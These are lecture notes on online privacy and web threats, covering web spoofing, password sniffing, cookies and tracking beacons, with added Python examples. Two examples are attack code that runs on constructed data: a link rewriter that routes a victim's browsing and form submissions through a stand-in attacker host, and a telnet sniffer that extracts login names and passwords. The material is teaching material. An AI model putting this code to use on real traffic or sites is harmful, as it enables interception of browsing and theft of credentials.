
Fall 2011


- Personal privacy
- Rights of individuals/entities
- Informational/database protection
- Government regulation & surveillance
- Workplace privacy
- Children's online privacy
- Freedom of speech & expression
- Anonymity online
- Phishing
- Privacy: encryption methods, spyware, filtering tools, spam, ...

Many online activities are open to public inspection. Engaging in these types of activities does not normally create an expectation of privacy. In fact, according to federal law, it is not illegal for anyone to view or disclose an electronic communication if the communication is "readily accessible" to the public (Electronic Communications Privacy Act, 18 USC § 2511(2)(g)(i)).

Yes. Many people expect that their online activities are anonymous. They are not. It is possible to record virtually all online activities, including which newsgroups or files a subscriber accesses and which web sites are visited. This information can be collected by a subscriber's own ISP and by web site operators.

Yes. Many of the commercial online services such as AOL automatically download graphics and program upgrades to the user's home computer. The subscriber is notified of these activities. But other intrusions are not so evident: some services have admitted to both accidental and intentional prying into the memory of personal computers.

Intruders want to control your system. Their motives:
- Peer respect
- Curiosity (can it be done?)
- Boredom
- Revenge
- Financial (company secrets)
- Employment
- Needed to hide other activities

Who the adversaries are:
- Thrill-seeking malicious hackers
- Competitors
- Enemies
- Other adversaries: school, games, romance, commerce, etc.
- Child molesters, pedophiles, murderers
- Buggy software
- Security professionals (to demonstrate problems)

What is at stake:
- Data loss
- Time loss
- Site hijacking/content changing
- Forged network connections
- Privacy loss
- Credit/financial loss
- Loss of innocence

On the Internet, we KNOW that:
- Many if not most users are naive: they will do whatever their computer tells them to do.
- Most users run buggy software, and are too lazy or not knowledgeable enough to upgrade.
- Users can't be expected to understand protocols: they won't check to see what security is in use.
- Users will leave their systems configured for maximum utility and ease of use.


Consumer devices that report back to their makers:
- Sportbrain: monitors your daily workout; a custom phone cradle uploads the data to the company web site for analysis. http://www.sportbrain.com/
- Sony eMarker: lets you figure out the artist and title of songs you hear on the radio, and keeps a personal log of all the music you like on the eMarker web site. http://www.emarker.com
- Creative Labs Nomad JukeBox: the music transfer software reports all uploads to Creative Labs. http://www.nomadworld.com

Threats on the web:
- Web spoofing
- Network sniffing
- Denial of service
- Privacy violations

Web spoofing: redirection of all web requests to a false web. URL rewriting catches the victim in the false web, e.g. http://www.attacker.org/http://netscape.com: the attacker fetches the real page and rewrites every link in it so that the next request again passes through the attacker. Spoofing of forms is equally possible, so anything the victim submits goes to the attacker first. "Secure connections" don't help: the connection to the attacker is genuinely secure, and the padlock vouches for nothing more than that. Fine-tuning of the attack gets rid of all the evidence, e.g. by hiding the status line and the location line so the rewritten URLs are never displayed.

The link you think you are making goes straight to the web server; the one you actually make goes through the attacker:
1. The client requests the spoofed URL from the attacker.
2. The attacker requests the real URL from the web server.
3. The web server sends the real page contents to the attacker.
4. The attacker changes the page contents.
5. The attacker sends the spoofed page contents to the client.
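The URL-rewriting step of this attack, and the check a user or proxy could apply to a link, as an added example in Python; it is not part of the original lecture. The attacker host www.attacker.org is the slide's own example; the sample page contents, the function names and the regular expression used to find link attributes are this example's assumptions.

```python
import re
from urllib.parse import urljoin, urlparse

# Assumed attacker-controlled host; the slide's own example uses this name.
ATTACKER_HOST = "www.attacker.org"

# href/src/action attributes with a quoted value (assumed simple HTML).
_LINK_ATTR = re.compile(r'''\b(href|src|action)=(["'])(.*?)\2''', re.IGNORECASE)


def rewrite_url(real_url: str, attacker_host: str = ATTACKER_HOST) -> str:
    """Attacker side: make a real URL pass through the attacker's server,
    e.g. http://netscape.com -> http://www.attacker.org/http://netscape.com."""
    return f"http://{attacker_host}/{real_url}"


def rewrite_page(html: str, real_page_url: str,
                 attacker_host: str = ATTACKER_HOST) -> str:
    """Attacker side (step 4 of the diagram): rewrite every link, image and
    form target so the victim never leaves the false web. Relative links are
    resolved against the real page's URL first; links already pointing at the
    attacker are left alone, so applying the function twice changes nothing."""
    def repl(match: re.Match) -> str:
        attr, quote, target = match.groups()
        real = urljoin(real_page_url, target)
        if urlparse(real).netloc == attacker_host:
            return match.group(0)
        return f"{attr}={quote}{rewrite_url(real, attacker_host)}{quote}"
    return _LINK_ATTR.sub(repl, html)


def embedded_url(url: str):
    """Defender side: if the path of a link itself begins with an absolute
    URL (the signature of URL rewriting), return that inner URL, else None.
    This check only works while the location line is visible; the slide
    notes that a refined attack hides it."""
    path = urlparse(url).path.lstrip("/")
    if path.startswith(("http://", "https://")):
        return path
    return None


# Constructed sample page, not a real site.
REAL_PAGE = """<html><body>
<a href="http://netscape.com/">Netscape</a>
<a href="/login">Login</a>
<form action="https://bank.example/transfer"><input name="amount"></form>
<img src="logo.gif">
</body></html>"""

if __name__ == "__main__":
    spoofed = rewrite_page(REAL_PAGE, "http://netscape.com/index.html")
    print(spoofed)
    for m in _LINK_ATTR.finditer(spoofed):
        print(m.group(3), "->", embedded_url(m.group(3)))
```

Note that the form's https action is rewritten along with everything else; the victim's browser will happily make a "secure" connection to the attacker instead, which is the point the slide makes about secure connections.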

A sniffer is a program that captures traffic on the network segment it is attached to. The classic password sniffer logs the first 128 bytes of every telnet connection that passes through the network, because those bytes contain the username and the password, both sent in cleartext. (Figure: an interface in normal mode, which only passes up frames addressed to its own host.)

A sniffer puts the interface in promiscuous mode, where it captures all packets placed on the subnet, not just those addressed to its own host. The first 128 bytes of each telnet connection are logged.
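The capture logic of such a sniffer, as an added Python example that is not part of the lecture. Putting a card into promiscuous mode needs root and a live interface, so the frames here are built in memory; the parser keeps the first 128 bytes of client-to-server data per telnet connection. The addresses, ports and login text are constructed, and the credential extraction assumes whole lines per segment, where a real telnet session sends one keystroke per segment.

```python
import struct
from collections import defaultdict

TELNET_PORT = 23
LOG_LIMIT = 128  # bytes kept per connection, the figure quoted on the slide


def _ip_bytes(dotted: str) -> bytes:
    return bytes(int(octet) for octet in dotted.split("."))


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int,
                payload: bytes) -> bytes:
    """Construct an Ethernet/IPv4/TCP frame for test input. Checksums are
    left zero; a real sniffer reads frames from the interface instead."""
    eth = b"\x00" * 12 + b"\x08\x00"  # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18,
                      65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     _ip_bytes(src_ip), _ip_bytes(dst_ip))
    return eth + ip + tcp


def parse_frame(frame: bytes):
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP frame,
    or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:  # protocol field: 6 = TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_offset:]


class TelnetSniffer:
    """Keeps the first LOG_LIMIT bytes the client sends on each telnet
    connection, keyed by (src, sport, dst, dport)."""

    def __init__(self, limit: int = LOG_LIMIT):
        self.limit = limit
        self.log = defaultdict(bytes)

    def feed(self, frame: bytes) -> None:
        parsed = parse_frame(frame)
        if parsed is None:
            return
        src, dst, sport, dport, payload = parsed
        if dport != TELNET_PORT:  # only the client-to-server direction
            return
        key = (src, sport, dst, dport)
        room = self.limit - len(self.log[key])
        if room > 0:
            self.log[key] += payload[:room]

    def credentials(self):
        """Simplified: the first two CR LF terminated lines the client sent
        are taken as login name and password."""
        found = {}
        for key, data in self.log.items():
            lines = data.replace(b"\r\n", b"\n").split(b"\n")
            if len(lines) >= 3:  # two complete lines plus the remainder
                found[key] = (lines[0].decode(errors="replace"),
                              lines[1].decode(errors="replace"))
        return found


# Constructed traffic, not a real capture: one telnet login, an HTTP request,
# the server's reply on the telnet session, and a second telnet connection
# that sends more than LOG_LIMIT bytes.
SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.1", 40000, TELNET_PORT, b"alice\r\n"),
    build_frame("10.0.0.7", "10.0.0.9", 40001, 80, b"GET / HTTP/1.0\r\n\r\n"),
    build_frame("10.0.0.5", "10.0.0.1", 40000, TELNET_PORT, b"s3cret\r\n"),
    build_frame("10.0.0.1", "10.0.0.5", TELNET_PORT, 40000, b"Last login: Mon\r\n"),
    build_frame("10.0.0.6", "10.0.0.1", 40002, TELNET_PORT, b"x" * 200),
]


def sniff(frames=SAMPLE_FRAMES) -> TelnetSniffer:
    sniffer = TelnetSniffer()
    for frame in frames:
        sniffer.feed(frame)
    return sniffer


if __name__ == "__main__":
    for key, creds in sniff().credentials().items():
        print(key, creds)
```

The 128-byte cap is what made these sniffers cheap to run on a busy router: it bounds the log per connection while still covering the login exchange at the start of every session.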


About three years ago someone launched a sniffer attack against two regional service providers' routers, through which huge amounts of traffic flow; one estimate is that the attackers got 10,000 accounts, hosts and passwords. Attacks of this kind recur periodically.

Denial of service: the attacker causes the server to crash, or floods the server or the network link with requests, in order to prevent the processing of legitimate requests. There are no truly effective solutions. One can detect an attack and filter packets from its source, but the attack could be distributed across many sources, which defeats filtering by source.

The web sites you use collect demographic information and transaction information, and the history of the current web session may be available to the server. Try this web location: http://hoohoo.ncsa.uiuc.edu/cgi/examples.html. Did you know that any web site can have your browser store data on your disk and hand it back later? The mechanism is the magic cookie: the server asks the browser to store a small record, and the browser returns it on later requests to that server. The disturbing part is that this happens without asking your consent and, unless you change your browser's settings, without your knowledge; the information can then be passed on to other web servers at the discretion of the server that created the cookie.

Browsers chatter about:
- IP address, domain name, organization
- Referring page
- Platform: OS, browser
- What information is requested: URLs and search terms
- Cookies
To anyone who might be listening:
- End servers
- System administrators
- Internet service providers
- Other third parties, e.g. advertising networks
- Anyone who might subpoena log files later

Many web services want a place for storing information about their customers. This information could be held on the server, but for a large user base the storage and lookup costs add up, and the server would still need some way to recognise a returning client. It is thus easier to keep the information at the customer's site with the help of a co-operating browser: the server asks the browser to store a cookie that contains the information the server will refer to the next time the client calls.

Cookies can be useful:
- Used like a staple to attach multiple parts of a form together
- Used to identify you when you return to a web site so you don't have to remember a password
- Used to help web sites understand how people use them
Cookies can do unexpected things:
- Used to profile users and track their activities, especially across web sites

A cookie stores a small string of characters. A web site asks your browser to "set" a cookie; whenever you return to that site, your browser sends the cookie back automatically.

First visit to site: site -> browser: "Please store cookie xyzzy"
Later visits: browser -> site: "Here is cookie xyzzy"

Cookie replay: sending a cookie back to a site.
Session cookie: a cookie replayed only during the current browsing session.
Persistent cookie: a cookie replayed until its expiration date.
First-party cookie: a cookie associated with the site the user requested.
Third-party cookie: a cookie associated with an image, ad, frame, or other content from a site with a different domain name that is embedded in the site the user requested. The browser decides what counts as third-party by domain name, even if both domains are owned by the same company.

Every time the same cookie is replayed to a site, the site may add information to the record associated with that cookie:
- Number of times you visit a link, time, date
- What page you visit
- What page you visited last
- Information you type into a web form
If multiple cookies are replayed together, they are usually logged together, effectively linking their data; a narrowly scoped cookie might get logged with a broadly scoped cookie.

How an ad company links a search to a name and address:
1. At a search service, the user searches for medical information; an ad on the results page sets the ad company's cookie.
2. At a CD store, the user buys a CD; an ad on that page replays the same cookie.
3. The ad company can get the user's name and address from the CD order and link them to the medical search.

Personal data:
- Email address
- Full name
- Mailing address (street, city, state and ZIP code)
- Phone number
Transactional data:
- Details of plane trips
- Search phrases used at search engines
- Health conditions

Part of the cookie file looks like this (fields are tab separated: domain, domain flag, path, secure flag, expiry, name, value):

# Netscape HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.

www.ft.com	TRUE	/cgi-bin/ft/bridge	FALSE	946641882	BRIDGE	Seen
www.esi.co.uk	FALSE	/free	FALSE	946685300	2101128	RkhIQ1RTVlRJICAgLDI2NjcxNDA=
.disney.com	TRUE	/	FALSE	1514892844	SWID	8AF1B6C4-8774-11D1-902E-00805FC18F5F
.disney.com	TRUE	/	FALSE	942189160	DOL	130210884190844
.excite.com	TRUE	/	FALSE	946641308	registered	no
.excite.com	TRUE	/	FALSE	946641477	UID	6BF1DD5034D834AC
.amazon.com	TRUE	/	FALSE	2082786916	ubid-main	9677-2013463-658329

A cookie in your browser includes the domain of the server that sent it (and the path it applies to) and, for persistent cookies, an expiry date after which the cookie is deleted; a cookie without an expiry date lasts only for the current browsing session. Additionally, the cookie may carry information such as whether you are registered for the site and whether you have a password and username. If on returning to the site the remote web server discovers that you have a cookie set, it can use this to retrieve the information stored about you on your previous visit. For example, an Internet bookstore web server might store information about your preferences in authors. It could then offer you a list of books based on your previous visit, rather than asking you to submit your profile again.

If you check your cookies.txt file, you may well find cookies from sites that you have no recollection of having visited. For example:

.doubleclick.net	TRUE	/	FALSE	1920499140	id	45855481

DoubleClick Inc is a US company which uses information stored in cookies for advertising purposes. The information is collected from users' cookies.txt files and used to determine, for example, which banner advertising to send to that user when he/she next visits a web site that carries DoubleClick content. DoubleClick claims that its use of cookies benefits web users by preventing "bombardment" by multiple copies of the same advertising.
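How the browser decides which of these entries to replay on a given request, and when one of them counts as third-party, as an added Python example written for this page; it is not part of the lecture. The entries are the ones shown on slides 31 and 33, restored to the format's tab-separated layout; the page host www.excite.com and the embedded ad host ad.doubleclick.net used in the demonstration are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timezone

# Entries from the excerpts on slides 31 and 33; the file as a whole is a
# constructed sample.
SAMPLE_COOKIES_TXT = (
    "# Netscape HTTP Cookie File\n"
    "# http://www.netscape.com/newsref/std/cookie_spec.html\n"
    "# This is a generated file!  Do not edit.\n"
    "\n"
    "www.ft.com\tTRUE\t/cgi-bin/ft/bridge\tFALSE\t946641882\tBRIDGE\tSeen\n"
    ".disney.com\tTRUE\t/\tFALSE\t1514892844\tSWID\t8AF1B6C4-8774-11D1-902E-00805FC18F5F\n"
    ".excite.com\tTRUE\t/\tFALSE\t946641477\tUID\t6BF1DD5034D834AC\n"
    ".amazon.com\tTRUE\t/\tFALSE\t2082786916\tubid-main\t9677-2013463-658329\n"
    ".doubleclick.net\tTRUE\t/\tFALSE\t1920499140\tid\t45855481\n"
)


@dataclass
class Cookie:
    domain: str        # a host or, with a leading dot, a whole domain
    domain_wide: bool  # TRUE flag: sent to every host under domain
    path: str          # only requests whose path starts with this get it
    secure: bool       # TRUE: only sent over a secure connection
    expires: int       # seconds since the epoch; 0 = session cookie
    name: str
    value: str

    @property
    def persistent(self) -> bool:
        return self.expires != 0

    def expiry(self):
        if not self.persistent:
            return None
        return datetime.fromtimestamp(self.expires, timezone.utc)

    def matches_host(self, host: str) -> bool:
        base = self.domain.lstrip(".")
        if self.domain_wide or self.domain.startswith("."):
            return host == base or host.endswith("." + base)
        return host == base


def parse_cookies_txt(text: str):
    cookies = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"malformed cookie line: {line!r}")
        domain, flag, path, secure, expires, name, value = fields
        cookies.append(Cookie(domain, flag == "TRUE", path, secure == "TRUE",
                              int(expires), name, value))
    return cookies


def cookies_sent_to(cookies, host: str, path: str = "/"):
    """The cookies a browser would replay on a request for path at host."""
    return [c for c in cookies if c.matches_host(host) and path.startswith(c.path)]


def first_and_third_party(cookies, page_host: str, embedded_hosts):
    """Split the cookies replayed while viewing a page on page_host that
    embeds content (images, ads, frames) from embedded_hosts. A cookie is
    third-party when the host receiving it is not the one the user asked
    for, regardless of who owns the two domains."""
    first = cookies_sent_to(cookies, page_host)
    third = [(host, c) for host in embedded_hosts
             for c in cookies_sent_to(cookies, host)
             if not c.matches_host(page_host)]
    return first, third


if __name__ == "__main__":
    jar = parse_cookies_txt(SAMPLE_COOKIES_TXT)
    for c in jar:
        print(c.domain, c.name, "expires", c.expiry())
    first, third = first_and_third_party(
        jar, "www.excite.com", ["ad.doubleclick.net", "www.excite.com"])
    print("first-party:", [c.name for c in first])
    print("third-party:", [(h, c.name) for h, c in third])
```

The ft.com entry shows why the path field matters: it is replayed only under /cgi-bin/ft/bridge, while the domain-wide entries with path / go back on every request to any host under their domain.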

You can set preferences for accepting cookies, e.g. in the Preferences item of the Netscape Edit menu. For example, you can ask to be warned before accepting any cookie. Some users create an empty cookies.txt file and disable write access to it.

Web bugs: invisible "images" (1-by-1 pixel, transparent) embedded in web pages that cause Referer information and cookies to be transferred to the image's server. Also called web beacons, clear GIFs, tracker GIFs, etc. They work just like banner ads from ad networks, but you can't see them unless you look at the code behind a web page. Also embedded in HTML-formatted email messages, MS Word documents, etc.
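Locating such beacons in a page, as an added Python example that is not from the lecture, using only the standard library. The sample page and its host names are constructed; the size and CSS heuristics are this example's own and will miss beacons sized by a stylesheet rather than by attributes.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class BeaconFinder(HTMLParser):
    """Collects <img> elements that look like web bugs: declared as 1x1 or
    0x0, or hidden with inline CSS, and fetched from a host other than the
    page's. Each one costs the browser a request that carries the Referer
    (this page's URL) and any cookies held for the beacon's host."""

    TINY = {"0", "1", "0px", "1px"}

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.beacons = []  # (absolute src, host, reason)

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k: (v or "") for k, v in attrs}
        if not a.get("src"):
            return
        url = urljoin(self.page_url, a["src"])
        host = urlparse(url).hostname
        if host is None or host == self.page_host:
            return  # same-host spacer images are not trackers
        reasons = []
        if a.get("width") in self.TINY and a.get("height") in self.TINY:
            reasons.append(f'{a["width"]}x{a["height"]}')
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            self.beacons.append((url, host, "; ".join(reasons)))


def find_beacons(html: str, page_url: str):
    finder = BeaconFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.beacons


def leaked_to(html: str, page_url: str):
    """Hosts that learn the page URL through the Referer of a beacon load,
    with the query string each beacon carries as its own payload."""
    return {host: urlparse(url).query
            for url, host, _ in find_beacons(html, page_url)}


# Constructed page; the hosts are placeholders, not real trackers.
SAMPLE_PAGE = """<html><body>
<img src="/images/logo.gif" width="200" height="50" alt="logo">
<img src="/images/spacer.gif" width="1" height="1">
<img src="http://ad.tracker.example/b.gif?cid=42&page=health" width="1" height="1">
<img src="https://stats.example.org/px" style="display: none" width="1" height="1" />
<img src="http://cdn.example.com/banner.jpg" width="468" height="60">
</body></html>"""

if __name__ == "__main__":
    page_url = "http://www.shop.example/item/7"
    for url, host, why in find_beacons(SAMPLE_PAGE, page_url):
        print(host, why, url)
    print(leaked_to(SAMPLE_PAGE, page_url))
```

The query string on the first beacon is how a tracker ties the load to a particular page or campaign; combined with the cookie it already holds for ad.tracker.example, it can add "visited a health page on www.shop.example" to the record for that user.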

- Helper programs and plug-ins can be dangerous
- Web sites collect information about YOU
- Do not let a web site interrogate you
- Web sites can lie
- Use common sense
- Stay out of bad neighborhoods

- Data is often collected silently: the web allows large quantities of data to be collected inexpensively and unobtrusively.
- Data from multiple sources may be merged: non-identifiable information can become identifiable when merged.
- Data collected for business purposes may be used in civil and criminal proceedings.
- Users are given no meaningful choice: few sites offer alternatives.

